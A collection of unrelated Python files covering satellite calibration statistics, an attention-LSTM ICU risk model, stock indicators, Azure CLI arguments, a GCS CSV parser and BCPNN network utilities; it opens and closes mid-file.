                    band = band + 1
                ##### 1. build the output file name
                dnName = 'DCC_%s_DN_CH_%02d_Rolldays_%s_ALL_Daily.txt' % (
                    satFlag, band, rollday)
                ##### 2. build the full output path
                dnOutFile = os.path.join(mpath, rollday, dnName)
                dccFiles = len(FileLst)
                DnPoints = len(dcc.dn[i, :, window])
                ##### 3. build the header line and the data record
                Title = ('%-15s' * 8 + '\n') % (
                    'date', 'Avg', 'Med', 'Mod', 'dccFiles',
                    'dccPoint', 'dccPrecent', 'dccDim')
                Data = ('%-15s' + '%-15.6f' * 3 + '%-15d' * 4 + '\n') % (
                    ymd, Dn_mean[i], Dn_median[i], Dn_mode[i],
                    dccFiles, DnPoints, percent, window)
                ##### 4. insert/update the dated record in the file
                dcc_data_write(Title, Data, dnOutFile)
            ######### REF values
            for i in range(Ref_mean.shape[0]):
                band = i + 1
                if i >= 4 and 'FY3C+MERSI' in satFlag:
                    band = band + 1
                ##### 1. build the output file name
                refName = 'DCC_%s_REF_CH_%02d_Rolldays_%s_ALL_Daily.txt' % (
                    satFlag, band, rollday)
                ##### 2. build the full output path
                refOutFile = os.path.join(mpath, rollday, refName)
                dccFiles = len(FileLst)
                RefPoints = len(dcc.ref[i, :, window])
                ##### 3. build the header line and the data record
                Title = ('%-15s' * 8 + '\n') % (
                    'date', 'Avg', 'Med', 'Mod', 'dccFiles',
                    'dccPoint', 'dccPrecent', 'dccDim')
                Data = ('%-15s' + '%-15.6f' * 3 + '%-15d' * 4 + '\n') % (
                    ymd, Ref_mean[i], Ref_median[i], Ref_mode[i],
                    dccFiles, RefPoints, percent, window)
                ##### 4. insert/update the dated record in the file
                dcc_data_write(Title, Data, refOutFile)
        date_s = date_s + relativedelta(days=1)
    print 'success daily: %s' % rollday
    # Derive the monthly averages from every daily file just written.
    in_file = os.path.join(mpath, rollday)
    file_list = get_file_list(in_file, r'.*Daily')
    for day_file in file_list:
        out_file = day_file.replace('Daily', 'Monthly')
        title = ('%-15s' * 8 + '\n') % (
            'date', 'Avg', 'Med', 'Mod', 'dccFiles',
            'dccPoint', 'dccPrecent', 'dccDim')
        day_datas = load_day_ext(day_file)
        month_data = month_average(day_datas)
        with open(out_file, 'w') as f:
            f.write(title)
            f.writelines(month_data)
    print 'success Monthly: %s' % rollday
########################### main entry point ############################
if __name__ == '__main__':
    # Command-line arguments (satellite flag + date range).
    args = sys.argv[1:]
    help_info = \
        u'''
        【参数1】:SAT or SAT+SENSOR or SAT1_SAT2
        【参数2】:yyyymmdd-yyyymmdd
        '''
    if '-h' in args:
        print help_info
        sys.exit(-1)
    # Locate this script and build the configuration-file path.
    MainPath, MainFile = os.path.split(os.path.realpath(__file__))
    ProjPath = os.path.dirname(MainPath)
    cfgFile = os.path.join(MainPath, 'global_dcc.cfg')
    # Bail out if the configuration file is missing.
    if not os.path.isfile(cfgFile):
        print (u'配置文件不存在 %s' % cfgFile)
        sys.exit(-1)
    # Load the configuration.
    inCfg = ConfigObj(cfgFile)
    # # start a process pool (disabled)
    # threadNum = 3
    # pool = Pool(processes=int(threadNum))
    if len(args) == 2:  # exactly two arguments are required
        satFlag = args[0]
        str_time = args[1]
        roll_days = inCfg['ext'][satFlag]['rollday']
        # A single config value comes back as str; normalize to a list.
        if isinstance(roll_days, str):
            roll_days = [roll_days]
        for num in roll_days:
            run(num)
    else:  # otherwise print the usage text
        print help_info
|
#!/usr/bin/env python
# coding: utf-8
import sys
import numpy as np
import pandas as pd
import tensorflow as tf
import scipy
from IPython.display import clear_output
from tensorflow.keras import activations, backend
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import os.path
import tensorflow.keras as keras
from tensorflow.keras import backend as K
from tensorflow.keras import Model, Input
from tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten,LSTM, TimeDistributed, Masking, Reshape, Lambda, RepeatVector, Permute, multiply
from tensorflow.keras.models import Sequential
from tensorflow.keras.callbacks import EarlyStopping
from sklearn.model_selection import StratifiedKFold, GridSearchCV, RepeatedKFold
from sklearn.utils import resample
from sklearn.metrics import roc_curve,roc_auc_score, confusion_matrix
from tensorflow.keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import KFold
import shap as sh
from keras import backend as K
tf.compat.v1.disable_eager_execution()
# should be 2.1.0
tf.__version__
# Attention layer: a softmax Dense layer (named 'attention_vec') produces
# per-feature weights that are multiplied element-wise onto the inputs.
def attention(inputs, SHAPE):
    steps = int(inputs.shape[1])
    weights = Permute((1, 2))(inputs)
    weights = Reshape((steps, SHAPE))(weights)
    weights = Dense(SHAPE, activation='softmax', name='attention_vec')(weights)
    return multiply([inputs, weights])
# Extract activation values from a trained model.
def get_activations(model, inputs, print_shape_only=False, layer_name=None, verbose=False):
    """Return the activations of every layer (or only of ``layer_name``)
    for the given inputs, evaluated with learning phase 1."""
    inp = model.input
    if layer_name is None:
        outputs = [layer.output for layer in model.layers]
    else:
        outputs = [layer.output for layer in model.layers if layer.name == layer_name]
    activations = []
    for out in outputs:
        func = K.function([inp] + [K.learning_phase()], [out])
        layer_activations = func([inputs, 1.])[0]
        activations.append(layer_activations)
        if verbose:
            # Either just the shape or the full tensor, as requested.
            print(layer_activations.shape if print_shape_only else layer_activations)
    return activations
# Function that creates the model based on parameters
def create_model(optimizer="adam", dropout=0.2, init='uniform', dense_nparams1=128, lr=0.001, n_wind=10):
    """Build and compile the attention + LSTM binary classifier.

    NOTE(review): ``optimizer`` and ``init`` are accepted but never used --
    the model is always compiled with RMSprop(lr).  ``dropout`` is applied
    as the LSTM's recurrent dropout.  ``n_features`` is read from module
    scope, so the data-loading section must run first -- confirm.
    """
    input_layer = Input(shape=(n_wind, n_features))
    x = attention(input_layer, n_features)
    x = LSTM(dense_nparams1, activation='tanh', return_sequences=False, recurrent_dropout = dropout)(x)
    preds = Dense(1, activation="sigmoid")(x)
    model = Model(inputs=input_layer, outputs=preds)
    RMS = keras.optimizers.RMSprop(lr=lr, rho=0.9, epsilon=1e-08)
    model.compile(optimizer=RMS, loss='binary_crossentropy', metrics=['acc'])
    return model
# Read training and test sets
train_x_path = "CardioICURisk/output/o4.x_train.csv"
test_x_path = "CardioICURisk/output/o4.x_test.csv"
train_y_path = "CardioICURisk/output/o4.y_train.csv"
test_y_path = "CardioICURisk/output/o4.y_test.csv"
x_train=np.loadtxt(open(train_x_path, 'rt'), delimiter=",", skiprows=1)
y_train=np.loadtxt(open(train_y_path, 'rt'), delimiter=",", skiprows=1, usecols = 1)
x_test=np.loadtxt(open(test_x_path, 'rt'), delimiter=",", skiprows=1)
y_test=np.loadtxt(open(test_y_path, 'rt'), delimiter=",", skiprows=1, usecols = 1)
# reshape from [samples, timesteps] into [samples, timesteps, features]
n_features = x_train.shape[1]
n_wind = 10
n_ind_train = int(x_train.shape[0]/n_wind)
n_ind_test = int(x_test.shape[0]/n_wind)
x_train = x_train.reshape((n_ind_train, 10, n_features))
x_test = x_test.reshape((n_ind_test, 10, n_features))
# NOTE(review): bare expression left from the notebook (display echo);
# y_train.shape appears twice -- probably y_test.shape was intended.
x_train.shape, y_train.shape, x_test.shape, y_train.shape
# select model's parameters based on best performance of 10-fold cross-validation
cv_res = pd.read_csv("CardioICURisk/output/o5.models_params.csv")
cv_res=cv_res.sort_values(by=['auc'], ascending=False)
dropout1= cv_res['dropout'].iloc[0]
unit_n1 = cv_res['unit_n'].iloc[0]
epoch_n1 = cv_res['epoch_n'].iloc[0]
lr1 = cv_res['lr'].iloc[0]
batch_n1 = cv_res['batch_n'].iloc[0]
# Create and train the model (20% of the training data held out for validation)
K.clear_session()
model=create_model(optimizer="adam", dropout=dropout1, init='uniform', dense_nparams1=unit_n1, lr=lr1, n_wind=10)
model.fit(x_train, y_train, batch_size=batch_n1, epochs=epoch_n1,
          validation_split=0.2, verbose=0)
# save output files: model, test-set predictions, and attention activations
model.save('CardioICURisk/output/o5.fin_model.h5')
y_test_prob=model.predict(x_test)
np.savetxt("CardioICURisk/output/o5.fin_model_pred.csv", y_test_prob, delimiter=',')
activations = get_activations(model, x_test, print_shape_only=True, layer_name='attention_vec', verbose=True)[0]
act_2d=activations.transpose(0,2,1).reshape(x_test.shape[0], x_test.shape[2]*10)
np.savetxt("CardioICURisk/output/o5.fin_model_act.csv", act_2d, delimiter=',')
|
# coding: utf-8
import logging
import numpy as np
from ppyt.indicators import IndicatorBase
from ppyt.indicators.closerecenthighlow_indicators import (
CloseGtRecentHighIndicator, CloseLtRecentLowIndicator
)
logger = logging.getLogger(__name__)
class UpperBreakoutIndicator(IndicatorBase):
    """Indicator flagging days with an upward breakout."""
    _findkey = 'UpperBreakout'
    def _build_indicator(self, span, **kwds):
        """Build the indicator data.

        Args:
            span: number of past days whose high the close must exceed
        """
        # Whether today's close exceeds the recent high of the previous days.
        indi = CloseGtRecentHighIndicator(stock=self.stock, span=span)
        arr1 = indi.data
        # The same series shifted one day into the past.
        arr2 = indi.shifted(-1)
        # True where yesterday was at/below the recent high and today broke above it.
        return np.logical_and(arr1, np.logical_not(arr2))
class LowerBreakoutIndicator(IndicatorBase):
    """Indicator flagging days with a downward breakout."""
    _findkey = 'LowerBreakout'
    def _build_indicator(self, span, **kwds):
        """Build the indicator data.

        Args:
            span: number of past days whose low the close must fall below
        """
        # Whether today's close fell below the recent low of the previous days.
        indi = CloseLtRecentLowIndicator(stock=self.stock, span=span)
        arr1 = indi.data
        # The same series shifted one day into the past.
        arr2 = indi.shifted(-1)
        # True where yesterday was at/above the recent low and today broke below it.
        return np.logical_and(arr1, np.logical_not(arr2))
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
from azure.cli.core.commands.parameters import (
tags_type,
get_three_state_flag,
resource_group_name_type,
get_location_type
)
from azure.cli.core.commands.validators import (
get_default_location_from_resource_group,
validate_file_or_dict
)
def load_arguments(self, _):
    """Register CLI argument definitions for the `connectedmachine` command
    group (Azure Arc machines and their extensions).

    NOTE: this module is AutoRest-generated -- manual edits will be lost
    when the code is regenerated.
    """
    with self.argument_context('connectedmachine list') as c:
        c.argument('resource_group_name', resource_group_name_type)
    with self.argument_context('connectedmachine show') as c:
        c.argument('resource_group_name', resource_group_name_type)
        c.argument('machine_name', options_list=['--name', '-n', '--machine-name'], type=str, help='The name of the '
                   'hybrid machine.', id_part='name')
    with self.argument_context('connectedmachine delete') as c:
        c.argument('resource_group_name', resource_group_name_type)
        c.argument('machine_name', options_list=['--name', '-n', '--machine-name'], type=str, help='The name of the '
                   'hybrid machine.', id_part='name')
    with self.argument_context('connectedmachine extension list') as c:
        c.argument('resource_group_name', resource_group_name_type)
        c.argument('machine_name', type=str, help='The name of the machine containing the extension.')
        c.argument('expand', type=str, help='The expand expression to apply on the operation.')
    with self.argument_context('connectedmachine extension show') as c:
        c.argument('resource_group_name', resource_group_name_type)
        c.argument('machine_name', type=str, help='The name of the machine containing the extension.', id_part='name')
        c.argument('name', options_list=['-n', '--extension-name', '--name'], type=str, help='The name of the machine '
                   'extension.', id_part='child_name_1')
    with self.argument_context('connectedmachine extension create') as c:
        c.argument('resource_group_name', resource_group_name_type)
        c.argument('machine_name', type=str, help='The name of the machine where the extension should be created or '
                   'updated.')
        c.argument('name', options_list=['-n', '--extension-name', '--name'], type=str, help='The name of the machine '
                   'extension.')
        c.argument('tags', tags_type)
        c.argument('location', arg_type=get_location_type(self.cli_ctx),
                   validator=get_default_location_from_resource_group)
        c.argument('force_update_tag', type=str, help='How the extension handler should be forced to update even if '
                   'the extension configuration has not changed.')
        c.argument('publisher', type=str, help='The name of the extension handler publisher.')
        c.argument('type_', options_list=['--type'], type=str, help='Specifies the type of the extension; an example '
                   'is "CustomScriptExtension".')
        c.argument('type_handler_version', type=str, help='Specifies the version of the script handler.')
        c.argument('auto_upgrade_minor_version', options_list=['--auto-upgrade-minor'],
                   arg_type=get_three_state_flag(), help='Indicates whether the extension should use a newer minor '
                   'version if one is available at deployment time. Once deployed, however, the extension will not '
                   'upgrade minor versions unless redeployed, even with this property set to true.')
        c.argument('settings', type=validate_file_or_dict, help='Json formatted public settings for the extension. '
                   'Expected value: json-string/@json-file.')
        c.argument('protected_settings', type=validate_file_or_dict, help='The extension can contain either '
                   'protectedSettings or protectedSettingsFromKeyVault or no protected settings at all. Expected '
                   'value: json-string/@json-file.')
    with self.argument_context('connectedmachine extension update') as c:
        c.argument('resource_group_name', resource_group_name_type)
        c.argument('machine_name', type=str, help='The name of the machine where the extension should be created or '
                   'updated.', id_part='name')
        c.argument('name', options_list=['-n', '--extension-name', '--name'], type=str, help='The name of the machine '
                   'extension.', id_part='child_name_1')
        c.argument('tags', tags_type)
        c.argument('force_update_tag', type=str, help='How the extension handler should be forced to update even if '
                   'the extension configuration has not changed.')
        c.argument('publisher', type=str, help='The name of the extension handler publisher.')
        c.argument('type_', options_list=['--type'], type=str, help='Specifies the type of the extension; an example '
                   'is "CustomScriptExtension".')
        c.argument('type_handler_version', type=str, help='Specifies the version of the script handler.')
        c.argument('auto_upgrade_minor_version', options_list=['--auto-upgrade-minor'],
                   arg_type=get_three_state_flag(), help='Indicates whether the extension should use a newer minor '
                   'version if one is available at deployment time. Once deployed, however, the extension will not '
                   'upgrade minor versions unless redeployed, even with this property set to true.')
        c.argument('settings', type=validate_file_or_dict, help='Json formatted public settings for the extension. '
                   'Expected value: json-string/@json-file.')
        c.argument('protected_settings', type=validate_file_or_dict, help='The extension can contain either '
                   'protectedSettings or protectedSettingsFromKeyVault or no protected settings at all. Expected '
                   'value: json-string/@json-file.')
    with self.argument_context('connectedmachine extension delete') as c:
        c.argument('resource_group_name', resource_group_name_type)
        c.argument('machine_name', type=str, help='The name of the machine where the extension should be deleted.',
                   id_part='name')
        c.argument('name', options_list=['-n', '--extension-name', '--name'], type=str, help='The name of the machine '
                   'extension.', id_part='child_name_1')
    with self.argument_context('connectedmachine extension wait') as c:
        c.argument('resource_group_name', resource_group_name_type)
        c.argument('machine_name', type=str, help='The name of the machine containing the extension.', id_part='name')
        c.argument('name', options_list=['-n', '--extension-name', '--name'], type=str, help='The name of the machine '
                   'extension.', id_part='child_name_1')
|
import h5py
import os.path
from .training_aux_wrapper import file_and_key_to_save
# load back data.
def load_model_performance(dataset, image_subset, neuron_subset,
                           seed, arch_name, opt_name):
    """Load a previously saved model-performance record from its HDF5 file.

    The directory, file name and HDF5 group key are derived via
    file_and_key_to_save() for the 'cnn_population' namespace and the
    model subtype '<arch_name>+<opt_name>'.

    :return: dict with key 'corr' holding the stored correlation array
        (the commented-out lines show other datasets stored in the group)
    """
    model_subtype = arch_name + '+' + opt_name
    # then check whether exists or not.
    dir_to_save, file_name_base, key_to_save = file_and_key_to_save('cnn_population', model_subtype,
                                                                    dataset, image_subset, neuron_subset, seed)
    result = dict()
    with h5py.File(os.path.join(dir_to_save, file_name_base), 'r') as f_out:
        grp = f_out[key_to_save]
        # result['y_test_hat'] = grp['y_test_hat'][...]
        result['corr'] = grp['corr'][...]
        # result['corr_val'] = grp['corr_val'][...]
    return result
|
from Jython_tasks.task import AutoFailoverNodesFailureTask, NodeDownTimerTask
class DiskError:
    """Simulates disk-failure scenarios (disk failure / disk full) on a
    server through AutoFailoverNodesFailureTask, and reverts them."""
    FAILOVER_DISK = "failover_disk"
    DISK_FULL = "disk_full"

    def __init__(self, logger, task_manager, orchestrator,
                 server_to_fail, timeout, pause_between_failover_action,
                 failover_expected, timeout_buffer, disk_timeout=120,
                 disk_location="/data", disk_size=5120):
        # Plumbing shared by every task this helper creates.
        self.log = logger
        self.task_manager = task_manager
        self.orchestrator = orchestrator
        self.server_to_fail = server_to_fail
        self.timeout = timeout
        self.pause_between_failover_action = pause_between_failover_action
        self.failover_expected = failover_expected
        self.timeout_buffer = timeout_buffer
        # Disk-specific knobs.
        self.disk_timeout = disk_timeout
        self.disk_location = disk_location
        self.disk_location_size = disk_size

    def create(self, action=None):
        """Start the disk scenario named by ``action`` and wait for it."""
        self.log.info("Simulation disk scenario '{0}'".format(action))
        # Map the public action name onto the failure type the task expects.
        task_actions = {
            DiskError.FAILOVER_DISK: "disk_failure",
            DiskError.DISK_FULL: "disk_full",
        }
        if action not in task_actions:
            self.log.warning("Unsupported disk action '{0}'".format(action))
            return
        task = AutoFailoverNodesFailureTask(
            self.task_manager, self.orchestrator, self.server_to_fail,
            task_actions[action], self.timeout,
            self.pause_between_failover_action, self.failover_expected,
            self.timeout_buffer, disk_timeout=self.disk_timeout,
            disk_location=self.disk_location,
            disk_size=self.disk_location_size)
        self.task_manager.add_new_task(task)
        self.task_manager.get_task_result(task)

    def revert(self, action=None):
        """Undo a previously created disk scenario and wait for it."""
        self.log.info("Reverting disk scenario '{0}'".format(action))
        # Map each scenario onto its recovery action.
        recovery_actions = {
            DiskError.FAILOVER_DISK: "recover_disk_failure",
            DiskError.DISK_FULL: "recover_disk_full_failure",
        }
        if action not in recovery_actions:
            self.log.warning("Unsupported disk action '{0}'".format(action))
            return
        task = AutoFailoverNodesFailureTask(
            self.task_manager, self.orchestrator, self.server_to_fail,
            recovery_actions[action], self.timeout,
            self.pause_between_failover_action,
            expect_auto_failover=False, timeout_buffer=self.timeout_buffer,
            check_for_failover=False, disk_timeout=self.disk_timeout,
            disk_location=self.disk_location,
            disk_size=self.disk_location_size)
        self.task_manager.add_new_task(task)
        self.task_manager.get_task_result(task)
|
from enum import Enum
class Shape(Enum):
    """Demo enum: ALIAS_FOR_SQUARE reuses SQUARE's value, so it becomes an
    alias of SQUARE rather than a distinct member."""
    SQUARE = 2
    DIAMOND = 1
    CIRCLE = 3
    ALIAS_FOR_SQUARE = 2

# All three expressions resolve to the canonical SQUARE member.
for shape in (Shape.SQUARE, Shape.ALIAS_FOR_SQUARE, Shape(2)):
    print(shape)
|
import json
import tempfile
from google.cloud import storage
import textparser
def handle_csv(file, sep=';', encoding='utf-8'):
    """Yield one dict per CSV data row, mapping lowercased header fields
    to parsed values.

    The first row is the header and is NOT yielded.  (The original code
    also yielded the header row zipped with itself, producing a bogus
    first record.)

    :param file: iterable of encoded byte lines (e.g. a binary file object)
    :param sep: field separator
    :param encoding: encoding used to decode each line
    """
    parser = textparser.GenericParser()
    hdr = []
    for ix, line in enumerate(file):
        line = line.decode(encoding).strip()
        if ix == 0:
            # Header row: remember the (lowercased) field names only.
            hdr = [field.lower() for field in line.split(sep)]
            continue
        vals = [parser.parse(val) for val in line.split(sep)]
        yield dict(zip(hdr, vals))
# Download a CSV blob from Google Cloud Storage into a temporary file and
# print the first records as JSON (smoke test for handle_csv).
storage_client = storage.Client()
bucket = storage_client.get_bucket('ks-tmp')
blob = bucket.get_blob('inf_diario_fi_202005.csv')
temp = tempfile.TemporaryFile('wb+')
blob.download_to_file(temp)
temp.seek(0)  # rewind so handle_csv reads from the start
# Only show the first rows, then stop.
for ix, data in enumerate(handle_csv(temp)):
    if ix > 10:
        break
    print(json.dumps(data))
temp.close()
import numpy as np
import IPython
def log_epsilon(x, epsilon=1e-10):
    """Numerically safe log: values below ``epsilon`` are clamped first."""
    clamped = np.maximum(x, epsilon)
    return np.log(clamped)
def calculate_probability(patterns):
    """
    Returns the probability from a list of patterns to be learned
    (the element-wise mean over all patterns).
    :param patterns: list of patterns to be learned
    :return: array of per-unit activation probabilities
    """
    total = np.zeros(patterns[0].size)
    for single_pattern in patterns:
        total = total + single_pattern
    return total / len(patterns)
def calculate_coactivations(patterns):
    """Mean outer product (co-activation matrix) over a list of patterns."""
    size = patterns[0].size
    acc = np.zeros((size, size))
    for single_pattern in patterns:
        acc = acc + np.outer(single_pattern, single_pattern)
    return acc / len(patterns)
def get_w(P, p, diagonal_zero=True):
    """BCPNN weights: log(P) - log(p ⊗ p) with logs clamped at 1e-10;
    optionally zeroes the diagonal.  (The safe log is inlined here instead
    of calling the log_epsilon helper.)"""
    eps = 1e-10
    w = np.log(np.maximum(P, eps)) - np.log(np.maximum(np.outer(p, p), eps))
    if diagonal_zero:
        w[np.diag_indices_from(w)] = 0
    return w
def get_w_pre_post(P, p_pre, p_post, p=1.0, epsilon=1e-20, diagonal_zero=True):
    """BCPNN weights from pre/post rates: log(p * P / (p_post ⊗ p_pre)),
    with the ratio clamped at ``epsilon`` before the log; optionally
    zeroes the diagonal.  (The safe log is inlined here instead of
    calling the log_epsilon helper.)"""
    ratio = p * (P / np.outer(p_post, p_pre))
    w = np.log(np.maximum(ratio, epsilon))
    if diagonal_zero:
        w[np.diag_indices_from(w)] = 0
    return w
def get_beta(p, epsilon=1e-10):
    """Bias terms: log of ``p`` with entries below ``epsilon`` clamped
    up to ``epsilon`` (avoids log(0))."""
    clamped = np.copy(p)
    clamped[clamped < epsilon] = epsilon
    return np.log(clamped)
def softmax(input, t=1.0, minicolumns=2):
    """Temperature softmax applied independently within each hypercolumn.

    The flat input is reshaped to (n_hypercolumns, minicolumns), a softmax
    with temperature ``t`` is computed along each row, and the result is
    flattened back to the input's size.

    Parameters
    ----------
    input : flat array-like whose size is a multiple of ``minicolumns``
        (name kept for backward compatibility although it shadows the builtin)
    t : float
        temperature
    minicolumns : int
        units per hypercolumn

    Returns
    -------
    np.ndarray of the same flat size, each hypercolumn summing to 1.

    Examples
    --------
    >>> softmax([0.1, 0.2])
    array([ 0.47502081,  0.52497919])
    >>> softmax([0, 10])
    array([  4.53978687e-05,   9.99954602e-01])
    """
    # Clip the scaled logits so np.exp neither underflows everywhere nor
    # overflows to inf.
    lower_bound = -600
    upper_bound = 600
    x = np.copy(input)
    x_size = x.size
    # FIX: integer (floor) division -- plain '/' yields a float on
    # Python 3 and makes np.reshape raise TypeError.
    x = np.reshape(x, (x_size // minicolumns, minicolumns))
    x = np.array(x) / t
    x[x < lower_bound] = lower_bound
    x[x > upper_bound] = upper_bound
    e = np.exp(x)
    # Normalize each hypercolumn (row) to sum to one; inlined so the
    # function no longer depends on the sibling normalize_array helper.
    dist = e / np.sum(e, axis=1)[:, np.newaxis]
    return np.reshape(dist, x_size)
def normalize_array(array):
    """Row-normalize a 2-D array: divide every row by its own sum."""
    row_sums = np.sum(array, axis=1)
    return array / row_sums[:, np.newaxis]
def normalize_p(p, hypercolumns, minicolumns):
    """Normalize a flat probability vector so that each hypercolumn
    (group of ``minicolumns`` consecutive units) sums to one."""
    grid = p.reshape((hypercolumns, minicolumns))
    grid = grid / np.sum(grid, axis=1)[:, np.newaxis]
    return grid.reshape(hypercolumns * minicolumns)
def load_minicolumn_matrix(w, sequence_indexes, value=1, inhibition=-1, extension=1,
                           decay_factor=1.0, sequence_decay=1.0):
    """Load one sequence into the connectivity matrix ``w`` in place.

    Consecutive patterns in ``sequence_indexes`` get a forward connection
    of strength ``value`` that decays linearly along the sequence position
    (``sequence_decay``); each pattern additionally projects to up to
    ``extension`` later patterns with a further linear decay
    (``decay_factor``).  Decayed values are clamped at 0.  Existing
    entries are overwritten (load_minicolumn_matrix2 is the accumulating
    variant).  ``inhibition`` is unused here; it is kept for signature
    parity with load_minicolumn_matrix2.
    """
    n_patterns = len(sequence_indexes)
    # Transform it to linear decay
    sequence_decay = value * sequence_decay
    for index, pattern_index in enumerate(sequence_indexes[:-1]):
        # Determine the value to load
        sequence_value = value - sequence_decay * index
        # This is in case it decays below 0
        if sequence_value <= 0:
            sequence_value = 0
        # First we set the sequence connection
        from_unit = pattern_index
        to_unit = sequence_indexes[index + 1]
        w[to_unit, from_unit] = sequence_value
        # Then set the after-effects (extension); near the end of the
        # sequence the reach is shortened so indexing stays in range.
        if index < n_patterns - extension - 1:
            aux = extension
        else:
            aux = n_patterns - index - 1
        aux_decay_factor = sequence_value * decay_factor
        for j in range(1, aux):
            to_unit = sequence_indexes[index + 1 + j]
            to_store = sequence_value - aux_decay_factor * j
            # If this gets below 0
            if to_store <= 0:
                to_store = 0
            w[to_unit, from_unit] = to_store
def load_minicolumn_matrix2(w, sequence_indexes, value=1, inhibition=-1, extension=1,
                            decay_factor=1.0, sequence_decay=1.0):
    """Load one sequence into ``w`` in place, accumulating repetitions.

    Like load_minicolumn_matrix, but entries already touched before (i.e.
    no longer equal to ``inhibition``) accumulate the new contribution
    instead of being overwritten.

    :param w: square connectivity matrix, modified in place
    :param sequence_indexes: ordered unit indexes of the sequence
    :param value: base weight for consecutive-pattern connections
    :param inhibition: background value marking never-modified entries
    :param extension: how many extra future patterns each unit projects to
    :param decay_factor: linear decay applied along the extension
    :param sequence_decay: linear decay applied along the sequence
    """
    n_patterns = len(sequence_indexes)
    # Transform it to linear decay
    sequence_decay = value * sequence_decay
    for index, pattern_index in enumerate(sequence_indexes[:-1]):
        # Determine the value to load, clamped at 0 once it decays below.
        sequence_value = value - sequence_decay * index
        if sequence_value <= 0:
            sequence_value = 0
        # First we set the sequence connection
        from_unit = pattern_index
        to_unit = sequence_indexes[index + 1]
        if w[to_unit, from_unit] == inhibition:
            # Never modified before: store the value.
            w[to_unit, from_unit] = sequence_value
        else:
            # Modified before: increase the plasticity.
            w[to_unit, from_unit] += sequence_value
        # Then set the after-effects (extension)
        if index < n_patterns - extension - 1:
            aux = extension
        else:
            aux = n_patterns - index - 1
        aux_decay_factor = sequence_value * decay_factor
        for j in range(1, aux):
            to_unit = sequence_indexes[index + 1 + j]
            to_store = sequence_value - aux_decay_factor * j
            if to_store <= 0:
                to_store = 0
            if w[to_unit, from_unit] == inhibition:
                w[to_unit, from_unit] = to_store
            else:
                # BUG FIX: the original unconditionally re-assigned
                # ``to_store`` right after this if/else, which silently
                # discarded the accumulation performed here.
                w[to_unit, from_unit] += to_store
def load_diagonal(w, sequence_index, value=1.0):
    """Set the self-connection ``w[i, i] = value`` for every unit in the sequence."""
    for unit in sequence_index:
        w[unit, unit] = value
def expand_matrix(w_small, hypercolumns, minicolumns):
    """Tile the minicolumn matrix across every (hypercolumn, hypercolumn) pair."""
    size = minicolumns * hypercolumns
    w_big = np.zeros((size, size))
    for row in range(hypercolumns):
        row_slice = slice(row * minicolumns, (row + 1) * minicolumns)
        for col in range(hypercolumns):
            col_slice = slice(col * minicolumns, (col + 1) * minicolumns)
            w_big[row_slice, col_slice] = w_small
    return w_big
def artificial_connectivity_matrix(hypercolumns, minicolumns, sequences, value=1, inhibition=-1, extension=1,
                                   decay_factor=0.5, sequence_decay=1.0, diagonal_zero=True, self_influence=True,
                                   ampa=False):
    """Build an artificial connectivity matrix for the given sequences.

    Starts from uniform inhibition, optionally loads self-connections and
    sequence transitions for every sequence, then tiles the minicolumn
    matrix over all hypercolumns. The diagonal of the expanded matrix is
    zeroed unless ``diagonal_zero`` is False.
    """
    w = inhibition * np.ones((minicolumns, minicolumns))
    if self_influence:
        for indexes in sequences:
            load_diagonal(w, indexes, value)
    # AMPA matrices carry only the self-connections, not the transitions.
    if not ampa:
        for indexes in sequences:
            load_minicolumn_matrix(w, indexes, value, inhibition, extension, decay_factor, sequence_decay)
    w_big = expand_matrix(w, hypercolumns, minicolumns)
    if diagonal_zero:
        w_big[np.diag_indices_from(w_big)] = 0
    return w_big
def artificial_beta_vector(hypercolumns, minicolumns, sequences, intensity, beta_decay):
    """Build the bias (beta) vector: each stored pattern accumulates an
    intensity that decays geometrically with its global position, and the
    minicolumn vector is repeated once per hypercolumn."""
    small_beta = np.zeros(minicolumns)
    flat_patterns = [pattern for sequence in sequences for pattern in sequence]
    for position, pattern in enumerate(flat_patterns):
        small_beta[pattern] += intensity * (beta_decay ** position)
    # Stack one copy of the minicolumn vector per hypercolumn.
    beta = []
    for _ in range(hypercolumns):
        beta = np.hstack((beta, small_beta))
    return beta
def create_artificial_manager(hypercolumns, minicolumns, sequences, value, inhibition, extension, decay_factor,
                              sequence_decay, dt, BCPNNFast, NetworkManager, ampa=True, beta=False, beta_decay=1.0,
                              self_influence=True, values_to_save=None):
    """Build a BCPNN network with artificially loaded NMDA (and optionally
    AMPA) connectivity plus an optional beta bias, and wrap it in a
    NetworkManager with the stored pattern indexes registered.

    ``values_to_save`` defaults to ``['o']`` when not given.
    """
    # BUG FIX: avoid a shared mutable default argument (`values_to_save=['o']`).
    if values_to_save is None:
        values_to_save = ['o']
    w_nmda = artificial_connectivity_matrix(hypercolumns, minicolumns, sequences, value=value, inhibition=inhibition,
                                            extension=extension, decay_factor=decay_factor,
                                            sequence_decay=sequence_decay,
                                            diagonal_zero=True, self_influence=self_influence, ampa=False)
    if ampa:
        w_ampa = artificial_connectivity_matrix(hypercolumns, minicolumns, sequences, value=value, inhibition=inhibition,
                                                extension=extension, decay_factor=decay_factor,
                                                sequence_decay=sequence_decay,
                                                diagonal_zero=True, self_influence=True, ampa=True)
    # Fixed seed keeps artificially-built networks reproducible.
    nn = BCPNNFast(hypercolumns=hypercolumns, minicolumns=minicolumns, prng=np.random.RandomState(seed=0))
    nn.w = w_nmda
    if ampa:
        nn.w_ampa = w_ampa
    if beta:
        nn.beta = artificial_beta_vector(hypercolumns, minicolumns, sequences, intensity=value, beta_decay=beta_decay)
    manager = NetworkManager(nn, dt=dt, values_to_save=values_to_save)
    # Register every pattern of every sequence as stored.
    for pattern_indexes in sequences:
        manager.stored_patterns_indexes += pattern_indexes
    return manager
def create_indepedent_sequences(minicolumns, sequence_length):
    """Split the minicolumns into consecutive, non-overlapping sequences.

    Returns ``minicolumns // sequence_length`` sequences of
    ``sequence_length`` consecutive indexes each (any remainder is dropped).
    """
    # BUG FIX: true division produced a float, and range(float) raises
    # TypeError on Python 3; integer division restores the intended count.
    n_sequences = minicolumns // sequence_length
    sequences = [[j * sequence_length + i for i in range(sequence_length)]
                 for j in range(n_sequences)]
